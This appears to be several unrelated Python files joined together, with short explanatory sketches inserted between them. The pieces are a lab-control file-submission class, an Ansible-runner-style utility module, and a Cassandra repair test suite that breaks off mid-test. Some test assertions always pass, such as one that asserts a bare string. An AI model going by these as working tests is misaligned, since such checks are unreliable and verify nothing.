def server_online(self): return self._server_online @server_online.setter @inmain_decorator(True) def server_online(self,value): self._server_online = str(value) # resend any files not sent if self.server_online: self.inqueue.put(['try again', None]) # update GUI self._ui.server_online.setText(value+(' (Files to send: %d)'%len(self._waiting_for_submission) if self._waiting_for_submission else '')) def get_queue(self): return self.inqueue def mainloop(self): self._mainloop_logger = logging.getLogger('BLACS.AnalysisSubmission.mainloop') while True: signal, data = self.inqueue.get() if signal == 'close': break elif signal == 'file': if self.send_to_server: self._waiting_for_submission.append(data) self.submit_waiting_files() elif signal == 'try 
again': self.submit_waiting_files() elif signal == 'clear': self._waiting_for_submission = [] else: self._mainloop_logger.error('Invalid signal: %s'%str(signal)) def check_connectivity_loop(self): time_to_sleep = 1 #self._check_connectivity_logger = logging.getLogger('BLACS.AnalysisSubmission.check_connectivity_loop') while True: # get the current host: host = self.server send_to_server = self.send_to_server if host and send_to_server: try: self.server_online = 'checking' response = zmq_get(self.port, host, 'hello', timeout = 2) if response == 'hello': success = True else: success = False except Exception: success = False # update GUI self.server_online = 'online' if success else 'offline' # update how long we should sleep if success: time_to_sleep = 10 else: time_to_sleep = 1 else: self.server_online = '' # stop sleeping if the host changes for i in range(time_to_sleep*5): if host == self.server and send_to_server == self.send_to_server: time.sleep(0.2) def submit_waiting_files(self): if not self._waiting_for_submission: return while self._waiting_for_submission: path = self._waiting_for_submission[0] try: self._mainloop_logger.info('Submitting run file %s.\n'%os.path.basename(path)) data = {'filepath': labscript_utils.shared_drive.path_to_agnostic(path)} response = zmq_get(self.port, self.server, data, timeout = 2) if response != 'added successfully': raise Exception except: return else: self._waiting_for_submission.pop(0)
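The submission mainloop above is a small, reusable shape: a daemon thread draining (signal, data) pairs from a queue until told to close. Reduced to a stdlib sketch — Python 2 imports to match the module, and handle_file is a hypothetical stand-in for submit_waiting_files; the file path is illustrative only:

import threading
import Queue  # Python 2, as in the module above

def mainloop(inqueue, handle_file):
    while True:
        signal, data = inqueue.get()
        if signal == 'close':
            break
        elif signal == 'file':
            handle_file(data)

inqueue = Queue.Queue()
worker = threading.Thread(target=mainloop, args=(inqueue, lambda path: None))
worker.daemon = True            # never block interpreter exit
worker.start()
inqueue.put(['file', '/tmp/example_shot.h5'])
inqueue.put(['close', None])
worker.join()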
utils.py
import json import sys import re import os import stat import fcntl import shutil import hashlib import tempfile import subprocess import base64 import threading import pipes import uuid try: from collections.abc import Iterable, Mapping except ImportError: from collections import Iterable, Mapping from io import StringIO from six import string_types, PY2, PY3, text_type, binary_type class Bunch(object): ''' Collect a bunch of variables together in an object. This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern. ''' def __init__(self, **kwargs): self.update(**kwargs) def update(self, **kwargs): self.__dict__.update(kwargs) def isplaybook(obj): ''' Inspects the object and returns if it is a playbook Args: obj (object): The object to be inspected by this function Returns: boolean: True if the object is a list and False if it is not ''' return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping)) def isinventory(obj): ''' Inspects the object and returns if it is an inventory Args: obj (object): The object to be inspected by this function Returns: boolean: True if the object is an inventory dict and False if it is not ''' return isinstance(obj, Mapping) or isinstance(obj, string_types) def check_isolation_executable_installed(isolation_executable): ''' Check that proot is installed. ''' cmd = [isolation_executable, '--version'] try: proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) proc.communicate() return bool(proc.returncode == 0) except (OSError, ValueError) as e: if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory raise RuntimeError('bwrap unavailable for unexpected reason.') return False def dump_artifact(obj, path, filename=None): ''' Write the artifact to disk at the specified path Args: obj (string): The string object to be dumped to disk in the specified path. The artifact filename will be automatically created path (string): The full path to the artifacts data directory. filename (string, optional): The name of file to write the artifact to. If the filename is not provided, then one will be generated. 
Returns: string: The full path filename for the artifact that was generated ''' p_sha1 = None if not os.path.exists(path): os.makedirs(path, mode=0o700) else: p_sha1 = hashlib.sha1() p_sha1.update(obj.encode(encoding='UTF-8')) if filename is None: fd, fn = tempfile.mkstemp(dir=path) else: fn = os.path.join(path, filename) if os.path.exists(fn): c_sha1 = hashlib.sha1() with open(fn) as f: contents = f.read() c_sha1.update(contents.encode(encoding='UTF-8')) if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest(): lock_fp = os.path.join(path, '.artifact_write_lock') lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR) fcntl.lockf(lock_fd, fcntl.LOCK_EX) try: with open(fn, 'w') as f: os.chmod(fn, stat.S_IRUSR) f.write(str(obj)) finally: fcntl.lockf(lock_fd, fcntl.LOCK_UN) os.close(lock_fd) os.remove(lock_fp) return fn def cleanup_artifact_dir(path, num_keep=0): # 0 disables artifact dir cleanup/rotation if num_keep < 1: return all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)], key=lambda x: os.path.getmtime(x)) total_remove = len(all_paths) - num_keep for f in range(total_remove): shutil.rmtree(all_paths[f]) def dump_artifacts(kwargs): ''' Introspect the kwargs and dump objects to disk ''' private_data_dir = kwargs.get('private_data_dir') if not private_data_dir: private_data_dir = tempfile.mkdtemp() kwargs['private_data_dir'] = private_data_dir if not os.path.exists(private_data_dir): raise ValueError('private_data_dir path is either invalid or does not exist') if 'role' in kwargs: role = {'name': kwargs.pop('role')} if 'role_vars' in kwargs: role['vars'] = kwargs.pop('role_vars') play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}] if kwargs.pop('role_skip_facts', False): play[0]['gather_facts'] = False kwargs['playbook'] = play if 'envvars' not in kwargs: kwargs['envvars'] = {} roles_path = kwargs.pop('roles_path', None) if not roles_path: roles_path = os.path.join(private_data_dir, 'roles') else: roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles')) kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path obj = kwargs.get('playbook') if obj and isplaybook(obj): path = os.path.join(private_data_dir, 'project') kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json') obj = kwargs.get('inventory') if obj and isinventory(obj): path = os.path.join(private_data_dir, 'inventory') if isinstance(obj, Mapping): kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json') elif isinstance(obj, string_types): if not os.path.exists(obj): kwargs['inventory'] = dump_artifact(obj, path, 'hosts') for key in ('envvars', 'extravars', 'passwords', 'settings'): obj = kwargs.get(key) if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)): path = os.path.join(private_data_dir, 'env') dump_artifact(json.dumps(obj), path, key) kwargs.pop(key) for key in ('ssh_key', 'cmdline'): obj = kwargs.get(key) if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)): path = os.path.join(private_data_dir, 'env') dump_artifact(str(kwargs[key]), path, key) kwargs.pop(key) class OutputEventFilter(object): ''' File-like object that looks for encoded job events in stdout data. 
''' EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K') def __init__(self, handle, event_callback, suppress_ansible_output=False, output_json=False): self._event_callback = event_callback self._counter = 0 self._start_line = 0 self._handle = handle self._buffer = StringIO() self._last_chunk = '' self._current_event_data = None self.output_json = output_json self.suppress_ansible_output = suppress_ansible_output def flush(self): # pexpect wants to flush the file it writes to, but we're not # actually capturing stdout to a raw file; we're just # implementing a custom `write` method to discover and emit events from # the stdout stream pass def write(self, data): self._buffer.write(data) # keep a sliding window of the last chunk written so we can detect # event tokens and determine if we need to perform a search of the full # buffer should_search = '\x1b[K' in (self._last_chunk + data) self._last_chunk = data # Only bother searching the buffer if we recently saw a start/end # token (\x1b[K) while should_search: value = self._buffer.getvalue() match = self.EVENT_DATA_RE.search(value) if not match: break try: base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1)) event_data = json.loads(base64.b64decode(base64_data).decode('utf-8')) except ValueError: event_data = {} event_data = self._emit_event(value[:match.start()], event_data) if not self.output_json: stdout_actual = event_data['stdout'] if 'stdout' in event_data else None else: stdout_actual = json.dumps(event_data) remainder = value[match.end():] self._buffer = StringIO() self._buffer.write(remainder) if stdout_actual and stdout_actual != "{}": if not self.suppress_ansible_output: sys.stdout.write( stdout_actual.encode('utf-8') if PY2 else stdout_actual ) sys.stdout.write("\n") sys.stdout.flush() self._handle.write(stdout_actual + "\n") self._handle.flush() self._last_chunk = remainder else: if not self.suppress_ansible_output: sys.stdout.write( data.encode('utf-8') if PY2 else data ) self._handle.write(data) self._handle.flush() # Verbose stdout outside of event data context if data and '\n' in data and self._current_event_data is None: # emit events for all complete lines we know about lines = self._buffer.getvalue().splitlines(True) # keep ends remainder = None # if last line is not a complete line, then exclude it if '\n' not in lines[-1]: remainder = lines.pop() # emit all complete lines for line in lines: self._emit_event(line) self._buffer = StringIO() # put final partial line back on buffer if remainder: self._buffer.write(remainder) def close(self): value = self._buffer.getvalue() if value: self._emit_event(value) self._buffer = StringIO() self._event_callback(dict(event='EOF')) def _emit_event(self, buffered_stdout, next_event_data=None): next_event_data = next_event_data or {} if self._current_event_data: event_data = self._current_event_data stdout_chunks = [buffered_stdout] elif buffered_stdout: event_data = dict(event='verbose') stdout_chunks = buffered_stdout.splitlines(True) else: event_data = dict() stdout_chunks = [] for stdout_chunk in stdout_chunks: if event_data.get('event') == 'verbose': event_data['uuid'] = str(uuid.uuid4()) self._counter += 1 event_data['counter'] = self._counter event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else "" n_lines = stdout_chunk.count('\n') event_data['start_line'] = self._start_line event_data['end_line'] = self._start_line + n_lines self._start_line += n_lines if self._event_callback: self._event_callback(event_data) if 
next_event_data.get('uuid', None):
            self._current_event_data = next_event_data
        else:
            self._current_event_data = None
        return event_data


def open_fifo_write(path, data):
    '''open_fifo_write opens the fifo named pipe in a new thread. This blocks
    the thread until an external process (such as ssh-agent) reads data from
    the pipe.
    '''
    os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
    threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
                     args=(path, data)).start()


def args2cmdline(*args):
    return ' '.join([pipes.quote(a) for a in args])


def ensure_str(s, encoding='utf-8', errors='strict'):
    """
    Copied from six==1.12

    Coerce *s* to `str`.

    For Python 2:
      - `unicode` -> encoded to `str`
      - `str` -> `str`

    For Python 3:
      - `str` -> `str`
      - `bytes` -> decoded to `str`
    """
    if not isinstance(s, (text_type, binary_type)):
        raise TypeError("not expecting type '%s'" % type(s))
    if PY2 and isinstance(s, text_type):
        s = s.encode(encoding, errors)
    elif PY3 and isinstance(s, binary_type):
        s = s.decode(encoding, errors)
    return s
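A short usage sketch for the artifact helpers above, assuming the module is importable as utils; the directory and payload are illustrative only:

import json
from utils import dump_artifact, args2cmdline

# dump_artifact(obj, path, filename) creates the directory if needed, writes
# the payload read-only, and returns the full path it wrote.
path = dump_artifact(json.dumps({'greeting': 'hello'}),
                     '/tmp/private_data_dir/env', 'extravars')
print(path)   # /tmp/private_data_dir/env/extravars

# args2cmdline shell-quotes each argument and joins them into one string.
print(args2cmdline('ansible-playbook', '-i', 'hosts', 'site.yml'))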
repair_test.py
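repair_test.py (below) runs blocking nodetool calls in a worker thread so that a wedged repair cannot stall the whole test session (see test_nonexistent_table_repair). The pattern, reduced to a stdlib sketch — run_with_timeout is a hypothetical helper, not part of the module:

import threading

def run_with_timeout(fn, timeout=60):
    # Run fn in a thread; return the exception it raised, if any.
    result = {}
    def target():
        try:
            fn()
        except Exception as e:
            result['error'] = e
    t = threading.Thread(target=target)
    t.start()
    t.join(timeout=timeout)
    assert not t.is_alive(), 'call still running after %ss' % timeout
    return result.get('error')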
import os import os.path import threading import time import re import pytest import logging from collections import namedtuple from threading import Thread from cassandra import ConsistencyLevel from cassandra.query import SimpleStatement from ccmlib.node import ToolError from dtest import FlakyRetryPolicy, Tester, create_ks, create_cf from tools.data import insert_c1c2, query_c1c2 from tools.jmxutils import JolokiaAgent, make_mbean since = pytest.mark.since logger = logging.getLogger(__name__) def _repair_options(version, ks='', cf=None, sequential=True): """ Function for assembling appropriate repair CLI options, based on C* version, as defaults have changed. @param ks The keyspace to repair @param cf The table to repair @param sequential If the repair should be a sequential repair [vs parallel] """ opts = [] # since version 2.2, default is parallel, otherwise it's sequential if sequential: if version >= '2.2': opts += ['-seq'] else: if version < '2.2': opts += ['-par'] # test with full repair if version >= '2.2': opts += ['-full'] if ks: opts += [ks] if cf: opts += [cf] return opts class BaseRepairTest(Tester): def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True): """ Function to verify the rows on a given node, without interference from the other nodes in the cluster @param node_to_check The given node to check. Should be the node, not the index @param rows The number of rows we expect @param found A list of partition keys that we expect to be on the node @param missings A list of partition keys we expect NOT to be on the node @param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test. 
""" if found is None: found = [] if missings is None: missings = [] stopped_nodes = [] for node in list(self.cluster.nodes.values()): if node.is_running() and node is not node_to_check: stopped_nodes.append(node) node.stop(wait_other_notice=True) session = self.patient_exclusive_cql_connection(node_to_check, 'ks') result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2), timeout=10)) assert len(result) == rows for k in found: query_c1c2(session, k, ConsistencyLevel.ONE) for k in missings: query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE) res = list(session.execute(query)) assert len([x for x in res if len(x) != 0]) == 0, res if restart: for node in stopped_nodes: node.start(wait_for_binary_proto=True) def _populate_cluster(self, start=True): cluster = self.cluster # Disable hinted handoff and set batch commit log so this doesn't # interfere with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() session = self.patient_cql_connection(node1, retry_policy=FlakyRetryPolicy(max_retries=15)) create_ks(session, 'ks', 3) if cluster.version() < '4.0': create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'}) else: create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys logger.debug("Inserting data...") insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL) node3.flush() node3.stop(wait_other_notice=True) insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO) node3.start(wait_for_binary_proto=True) insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL) cluster.flush() def _repair_and_verify(self, sequential=True): cluster = self.cluster node1, node2, node3 = cluster.nodelist() # Verify that node3 has only 2000 keys logger.debug("Checking data on node3...") self.check_rows_on_node(node3, 2000, missings=[1000]) # Verify that node1 has 2001 keys logger.debug("Checking data on node1...") self.check_rows_on_node(node1, 2001, found=[1000]) # Verify that node2 has 2001 keys logger.debug("Checking data on node2...") self.check_rows_on_node(node2, 2001, found=[1000]) time.sleep(10) # see CASSANDRA-4373 # Run repair start = time.time() logger.debug("starting repair...") node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) logger.debug("Repair time: {end}".format(end=time.time() - start)) # Validate that only one range was transfered out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node3.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, \ "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) # Check node3 now has the key self.check_rows_on_node(node3, 2001, found=[1000], restart=False) class TestRepair(BaseRepairTest): 
@since('2.2.1', max_version='4') def test_no_anticompaction_after_dclocal_repair(self): """ * Launch a four node, two DC cluster * Start a -local repair on node1 in dc1 * Assert that the dc1 nodes see repair messages * Assert that the dc2 nodes do not see repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50']) node1_1.nodetool("repair -local keyspace1 standard1") assert node1_1.grep_log("Not a global repair") assert node2_1.grep_log("Not a global repair") # dc2 should not see these messages: assert not node1_2.grep_log("Not a global repair") assert not node2_2.grep_log("Not a global repair") # and no nodes should do anticompaction: for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") # @pytest.mark.skipif(CASSANDRA_VERSION_FROM_BUILD == '3.9', reason="Test doesn't run on 3.9") @pytest.mark.skip_version('3.9') def test_nonexistent_table_repair(self): """ * Check that repairing a non-existent table fails @jira_ticket CASSANDRA-12279 """ self.fixture_dtest_setup.ignore_log_patterns = [r'Unknown keyspace/cf pair'] cluster = self.cluster logger.debug('Starting nodes') cluster.populate(2).start() node1, _ = cluster.nodelist() logger.debug('Creating keyspace and tables') node1.stress(stress_options=['write', 'n=1', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=1']) logger.debug('Repairing non-existent table') def repair_non_existent_table(): global nodetool_error try: node1.nodetool('repair keyspace1 standard2') except Exception as e: nodetool_error = e # Launch in a external thread so it does not hang process t = Thread(target=repair_non_existent_table) t.start() t.join(timeout=60) assert not t.is_alive(), 'Repair thread on inexistent table is still running' if self.cluster.version() >= '2.2': node1.watch_log_for("Unknown keyspace/cf pair", timeout=60) # Repair only finishes with error status after CASSANDRA-12508 on 3.0+ if self.cluster.version() >= '3.0': assert 'nodetool_error' in globals() and isinstance(nodetool_error, ToolError), \ 'Repair thread on inexistent table did not throw exception' logger.debug(repr(nodetool_error)) assert 'Unknown keyspace/cf pair' in repr(nodetool_error),\ 'Repair thread on inexistent table did not detect inexistent table.' 
@since('2.2.1', max_version='4') def test_no_anticompaction_after_hostspecific_repair(self): """ * Launch a four node, two DC cluster * Start a repair on all nodes, by enumerating with -hosts * Assert all nodes see repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50']) node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1") for node in cluster.nodelist(): assert node.grep_log("Not a global repair") for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") @since('2.2.4', max_version='4') def test_no_anticompaction_after_subrange_repair(self): """ * Launch a three node cluster * Start a repair on a token range * Assert all nodes see repair messages * Assert no nodes anticompact # TODO: Verify the anticompaction with sstablemetadata, not just logs @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50']) node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1") for node in cluster.nodelist(): assert node.grep_log("Not a global repair") for node in cluster.nodelist(): assert not node.grep_log("Starting anticompaction") def _get_repaired_data(self, node, keyspace): """ Based on incremental_repair_test.py:TestIncRepair implementation. """ _sstable_name = re.compile('SSTable: (.+)') _repaired_at = re.compile(r'Repaired at: (\d+)') _sstable_data = namedtuple('_sstabledata', ('name', 'repaired')) out = node.run_sstablemetadata(keyspace=keyspace).stdout def matches(pattern): return [_f for _f in [pattern.match(l) for l in out.split('\n')] if _f] names = [m.group(1) for m in matches(_sstable_name)] repaired_times = [int(m.group(1)) for m in matches(_repaired_at)] assert names assert repaired_times return [_sstable_data(*a) for a in zip(names, repaired_times)] @since('2.2.10', max_version='4') def test_no_anticompaction_of_already_repaired(self): """ * Launch three node cluster and stress with RF2 * Do incremental repair to have all sstables flagged as repaired * Stop node2, stress, start again and run full -pr repair * Verify that none of the already repaired sstables have been anti-compacted again @jira_ticket CASSANDRA-13153 """ cluster = self.cluster logger.debug("Starting cluster..") # disable JBOD conf since the test expects sstables to be on the same disk cluster.set_datadir_count(1) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # we use RF to make sure to cover only a set of sub-ranges when doing -full -pr node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=50']) # disable compaction to make sure that we won't create any new sstables with repairedAt 0 node1.nodetool('disableautocompaction keyspace1 standard1') # Do incremental repair of all ranges. All sstables are expected to have repairedAt set afterwards.
node1.nodetool("repair keyspace1 standard1") meta = self._get_repaired_data(node1, 'keyspace1') repaired = set([m for m in meta if m.repaired > 0]) assert len(repaired) == len(meta) # stop node2, stress and start full repair to find out how synced ranges affect repairedAt values node2.stop(wait_other_notice=True) node1.stress(stress_options=['write', 'n=40K', 'no-warmup', 'cl=ONE', '-rate', 'threads=50']) node2.start(wait_for_binary_proto=True) node1.nodetool("repair -full -pr keyspace1 standard1") meta = self._get_repaired_data(node1, 'keyspace1') repairedAfterFull = set([m for m in meta if m.repaired > 0]) # already repaired sstables must remain untouched assert repaired.intersection(repairedAfterFull) == repaired @since('2.2.1', '4') def test_anticompaction_after_normal_repair(self): """ * Launch a four node, two DC cluster * Start a normal repair * Assert every node anticompacts @jira_ticket CASSANDRA-10422 """ cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([2, 2]).start() node1_1, node2_1, node1_2, node2_2 = cluster.nodelist() node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)']) node1_1.nodetool("repair keyspace1 standard1") for node in cluster.nodelist(): assert "Starting anticompaction" def test_simple_sequential_repair(self): """ Calls simple repair test with a sequential repair """ self._simple_repair(sequential=True) def test_simple_parallel_repair(self): """ Calls simple repair test with a parallel repair """ self._simple_repair(sequential=False) def test_empty_vs_gcable_sequential_repair(self): """ Calls empty_vs_gcable repair test with a sequential repair """ self._empty_vs_gcable_no_repair(sequential=True) def test_empty_vs_gcable_parallel_repair(self): """ Calls empty_vs_gcable repair test with a parallel repair """ self._empty_vs_gcable_no_repair(sequential=False) def test_range_tombstone_digest_sequential_repair(self): """ Calls range_tombstone_digest with a sequential repair """ self._range_tombstone_digest(sequential=True) def test_range_tombstone_digest_parallel_repair(self): """ Calls range_tombstone_digest with a parallel repair """ self._range_tombstone_digest(sequential=False) @since('2.1') def test_shadowed_cell_digest_sequential_repair(self): """ Calls _cell_shadowed_by_range_tombstone with sequential repair """ self._cell_shadowed_by_range_tombstone(sequential=True) @since('2.1') def test_shadowed_cell_digest_parallel_repair(self): """ Calls _cell_shadowed_by_range_tombstone with parallel repair """ self._cell_shadowed_by_range_tombstone(sequential=False) @since('3.0') def test_shadowed_range_tombstone_digest_sequential_repair(self): """ Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair """ self._range_tombstone_shadowed_by_range_tombstone(sequential=True) @since('3.0') def test_shadowed_range_tombstone_digest_parallel_repair(self): """ Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair """ self._range_tombstone_shadowed_by_range_tombstone(sequential=False) @pytest.mark.no_vnodes def test_simple_repair_order_preserving(self): """ Calls simple repair test with OPP and sequential repair @jira_ticket CASSANDRA-5220 """ self._simple_repair(order_preserving_partitioner=True) def _simple_repair(self, order_preserving_partitioner=False, sequential=True): """ * Configure a three node cluster to not use hinted handoff, and to use batch commitlog * Launch the cluster * Create a keyspace at RF 3 and table * Insert one thousand rows at CL ALL * 
Flush on node3 and shut it down * Insert one row at CL TWO * Restart node3 * Insert one thousand more rows at CL ALL * Flush all nodes * Check node3 only has 2000 keys * Check node1 and node2 have 2001 keys * Perform the repair type specified by the parent test * Assert the appropriate messages are logged * Assert node3 now has all data @jira_ticket CASSANDRA-4373 """ if order_preserving_partitioner: self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner') self._populate_cluster() self._repair_and_verify(sequential) def _empty_vs_gcable_no_repair(self, sequential): """ Repairing empty partition and tombstoned partition older than gc grace should be treated as the same and no repair is necessary. @jira_ticket CASSANDRA-8979. """ cluster = self.cluster cluster.populate(2) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) cluster.start() node1, node2 = cluster.nodelist() session = self.patient_cql_connection(node1) # create keyspace with RF=2 to be able to be repaired create_ks(session, 'ks', 2) # we create two tables, one has low gc grace seconds so that the data # can be dropped during test (but we don't actually drop them). # the other has default gc. # compaction is disabled not to purge data query = """ CREATE TABLE cf1 ( key text, c1 text, c2 text, PRIMARY KEY (key, c1) ) WITH gc_grace_seconds=1 AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) time.sleep(.5) query = """ CREATE TABLE cf2 ( key text, c1 text, c2 text, PRIMARY KEY (key, c1) ) WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) time.sleep(.5) # take down node2, so that only node1 has gc-able data node2.stop(wait_other_notice=True) for cf in ['cf1', 'cf2']: # insert some data for i in range(0, 10): for j in range(0, 1000): query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() # delete those data, half with row tombstone, and the rest with cell range tombstones for i in range(0, 5): query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() for i in range(5, 10): for j in range(0, 1000): query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() # sleep until gc grace seconds pass so that cf1 can be dropped time.sleep(2) # bring up node2 and repair node2.start(wait_for_binary_proto=True) node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) # check no rows will be returned for cf in ['cf1', 'cf2']: for i in range(0, 10): query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL) res = list(session.execute(query)) assert len([x for x in res if len(x) != 0]) == 0, res # check log for no repair happened for gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf1".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs]) # check log for actual repair for non gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) 
range\(s\) out of sync for cf2".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) > 0, "Non GC-able data should be repaired" def _range_tombstone_digest(self, sequential): """ multiple range tombstones for same partition and interval must not create a digest mismatch as long as the most recent tombstone is present. @jira_ticket cassandra-11349. """ def withsession(session, node1): session.execute("delete from table1 where c1 = 'a' and c2 = 'b'") node1.flush() # recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2) session.execute("delete from table1 where c1 = 'a' and c2 = 'b'") self._repair_digest(sequential, withsession) def _cell_shadowed_by_range_tombstone(self, sequential): """ Cells shadowed by range tombstones must not effect repairs (given tombstones are present on all nodes) @jira_ticket CASSANDRA-11349. """ def withSession(session, node1): session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'") self._repair_digest(sequential, withSession) def _range_tombstone_shadowed_by_range_tombstone(self, sequential): """ Range tombstones shadowed by other range tombstones must not effect repairs @jira_ticket CASSANDRA-11349. """ def withSession(session, node1): session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'") self._repair_digest(sequential, withSession) def _repair_digest(self, sequential, populate): cluster = self.cluster cluster.populate(2) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) cluster.start() node1, node2 = cluster.nodelist() session = self.patient_cql_connection(node1) # create keyspace with RF=2 to be able to be repaired create_ks(session, 'ks', 2) query = """ CREATE TABLE IF NOT EXISTS table1 ( c1 text, c2 text, c3 text, c4 float, PRIMARY KEY (c1, c2, c3) ) WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) populate(session, node1) node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) # check log for no repair happened for gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for table1".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs])) def test_local_dc_repair(self): """ * Set up a multi DC cluster * Perform a -local repair on one DC * Assert only nodes in that DC are repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] 